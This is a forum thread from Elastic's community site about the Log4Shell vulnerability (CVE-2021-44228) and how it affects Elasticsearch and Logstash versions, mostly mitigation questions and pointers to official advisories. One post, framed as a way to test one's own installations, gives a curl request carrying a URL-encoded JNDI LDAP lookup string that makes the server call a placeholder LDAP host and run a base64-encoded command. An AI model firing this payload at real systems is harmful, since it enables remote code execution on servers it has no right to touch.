Hi,
Is there any way to validate before and after scenarios of setting JVM option?
Thanks
Hi,
Is there any way to validate before and after scenarios of setting JVM option?
Thanks
Hello,
about Elasticsearch 2 you wrote :
Elasticsearch 2 and earlier used a Log4j version that is not vulnerable to the newly discovered flaw. Please note that Elasticsearch 2 is not a supported version, and we always recommend updating to the latest release.
But at Restrict LDAP access via JNDI by rgoers · Pull Request #608 · apache/logging-log4j2 · GitHub
we can read that Log4j 1.x may be impacted if their configuration uses JNDI. However, the risk is much lower.
Can you confirm that Elasticsearch 2 is not impacted ?
Thank you.
I recognized that all versions should consider addressing with one of these, although the risks are small and large.
With 7.14.1 and log4j2 2.16.0 jars in place, one option that I tried today is remove x-pack-deprecation and try to see if we ES is able to startup or not.
Found that it does work but not sure whether that is a possible solution to use. @sandeepkanabar any comments on it?
I completely understand from your earlier reply that there might be a good reason for keeping the jar, but this is something we tried out.
As per Log4j – Apache Log4j Security Vulnerabilities , setting jvm property is not enough to mitigate the risk.
Would you please share your thoughts on that?
@sandeepk-veritas - never a good idea to mix 3rd party applications (ES here) with the latest log4j jar instead of the one they ship with. Let's say I'm using your product but I don't use what you recommend and instead add some other jar to it. You never know what it might break in prod. This is very risky to do in PROD unless you've tested all the scenarios.
Will there happen to be a version of this page for Windows Server versions?
Hey @orangejulius, I was able to get ES 5.3.0 to hit a local server emulating LDAP, though haven't gotten to a stage yet where any data is leaked. Nonetheless, it shows that a call to an external server is very possible, at least with the param's I'm using locally (see steps below). It's easy enough to re-create on other version of ES, so hope this is useful for others to test their installations.
Steps:
docker pull elasticsearch:5.3.0
)rootLogger.level = debug
)curl localhost:9200/%24%7Bjndi%3Aldap%3A%2F%2Fprivate-ip-here%3A1389%2FBasic%2FCommand%dG91Y2ggL3RtcC9wd25lZAo%3D%7D
Result: You'll see the LDAP server confirm that it received a network request (Received request from <IP of the ES node>
). There are likely other interesting results, I'll update this post if I find any.
Interesting questions/next steps:
info
?Thanks a lot. I appreciate the link to the blog, it clarifies a lot of doubts.
I wanted this information.
Thank you, Announcement.
Elasticsearch mitigation summary matrix
Hi Sandeep,
You can upgrade your ES to 7.16.2 which has latest log4j 2.17.0
Check the updated advisory.
To all those worrying about log4j jars in vendor
directory in Logstash et al, elastic has come out with a removal tool and an excellent article on Logstash - Logstash 5.0.0-6.8.20 and 7.0.0-7.16.0: Log4j CVE-2021-44228, CVE-2021-45046 remediation
Any update on this?
All updates are posted here: Apache Log4j2 Remote Code Execution (RCE) Vulnerability - CVE-2021-44228 - ESA-2021-31 - Security Announcements - Discuss the Elastic Stack
We do not recommend, nor support, directly modifying libraries within the Elasticsearch package. If you want to understand how to protect yourself from this issue, then please read and follow the official advisory.
This topic was automatically closed 28 days after the last reply. New replies are no longer allowed.
© 2020. All Rights Reserved - Elasticsearch
Apache, Apache Lucene, Apache Hadoop, Hadoop, HDFS and the yellow elephant logo are trademarks of the Apache Software Foundation in the United States and/or other countries.